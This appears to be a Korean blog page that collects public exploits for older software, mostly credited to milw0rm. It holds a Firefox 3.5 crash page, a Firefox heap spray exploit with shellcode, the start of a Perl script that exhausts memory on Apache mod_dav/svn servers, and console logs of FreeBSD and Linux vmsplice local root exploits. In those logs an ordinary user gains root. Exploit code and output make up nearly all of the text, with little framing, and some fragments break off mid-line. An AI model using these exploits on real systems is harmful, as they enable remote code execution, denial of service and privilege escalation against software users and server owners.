파이어폭스 3.5 유니코드 스택 오버플로우http://www.yongbok.net/firefox3.5_unicode_stack_overflow.php<html> <head> <script language=”JavaScript” type=”Text/Javascript”> var str = unescape(“%u4141%u4141”); var str2 = unescape(“%u0000%u0000”); var finalstr2 = mul8(str2, 49000000); var finalstr = mul8(str, 21000000); document.write(finalstr2); document.write(finalstr); function mul8 (str, num) { var i = Math.ceil(Math.log(num) / Math.LN2), res = str; do { res += res; } while (0 < –i); return res.slice(0, str.length * num); } </script> </head> <body> </body> </html> <html><body></body></html> # milw0rm.com
파이어폭스 3.5 버전에서 아래의 html 소스 코드로 공격 할수 있는 취약점이 발견 되었습니다.http://www.yongbok.net/firefox3.5_exploit.php<html> <head> <title>Firefox 3.5 Vulnerability</title> Firefox 3.5 Heap Spray Vulnerabilty </br> Author: SBerry aka Simon Berry-Byrne </br> Thanks to HD Moore for the insight and Metasploit for the payload <div id=”content”> <p> <FONT> </FONT> </p> <p> <FONT>Loremipsumdoloregkuw</FONT></p> <p> <FONT>Loremipsumdoloregkuwiert</FONT> </p> <p> <FONT>Loremikdkw </FONT> </p> </div> <script language=JavaScript> /* Calc.exe */ var shellcode = unescape(“%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800” + “%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A” + “%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350” + “%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40” + “%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000” + “%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040” + “%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD” + “%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40” + “%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18” + “%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0” + “%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B” + “%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24” + “%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9” + “%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C” + “%u652E%u6578%u9000”); /* Heap Spray Code */ oneblock
Apache mod_dav / svn Remote Denial of Service Exploit### furoffyourcat.pl### Apache mod_dav / svn Remote Denial of Service Exploit### by kcope / June 2009###### Will exhaust all system memory### Needs Authentication on normal DAV###### This can be especially serious stuff when used against### svn (subversion) servers!! Svn might let the PROPFIND slip through### without authentication. bwhahaaha :o)### use at your own risk!##################################################################use IO::Socket;use MIME::Base64;sub usage { print “Apache mod_dav / svn Remote Denial of Service Exploitn”; print “by kcope in 2009n”; print “usage: perl furoffyourcat.pl <remotehost> <webdav folder> n”; print “example: perl furoffyourcat.pl svn.XXX.com /projects/n”;exit;}if ($#ARGV < 1) {usage();}$hostname =
FreeBSD 7.0~7.1 에서 익스플로잇이….$ lsroot.c$ gcc -o root root.c$ lsroot root.c$ iduid=1001(ruo91) gid=1001(ruo91) groups=1001(ruo91)$ ./rootFreeBSD local kernel root exploitby: christer/mu-bhttp://www.bsdcitizen.org/ — BSDCITIZEN 2008!@$!* allocated pointer page: 0x00000000 -> 0x08000000 * allocated itimer struct: 0x20000000 -> 0x200000DC * filling pointer page… done* found posix_clocks @ * it_page->it_clockid: 0x0CBFC70D * ktimer_delete (0xD0000000)* ktimer_delete: 0 1$ iduid=1001(ruo91) gid=1001(ruo91) euid=0(root) groups=1001(ruo91)**FreeBSD7.0~7.1 Local kernel root exploithttp://milw0rm.com/exploits/8261
Linux 2.6.17 – 2.6.24.1 해당되며, 아래에서 보시는 것과 같이 root 로 바로 로그인 됩니다.ruo91@YongBok:~$ uname -aLinux YongBok.com 2.6.18 #1 SMP Fri Sep 22 13:02:54 KST 2006 i686 GNU/Linuxruo91@Yongbok:~$ iduid=1000(hehe) gid=100(users) groups=100(users)ruo91@Yongbok:~$ ./root-exploite———————————–Linux vmsplice Local Root ExploitBy qaaz———————————– mmap: 0x0 .. 0x1000 page: 0x0 page: 0x20 mmap: 0x4000 .. 0x5000 page: 0x4000 page: 0x4020 mmap: 0x1000 .. 0x2000 page: 0x1000 mmap: 0xb7dfd000 .. 0xb7e2f000 rootruo91@Yongbok:~# iduid=0(root) gid=0(root) groups=100(users)Linux Kernel 2.6.17 – 2.6.24.1 vmsplice Local Root Exploithttp://www.milw0rm.com/exploits/5092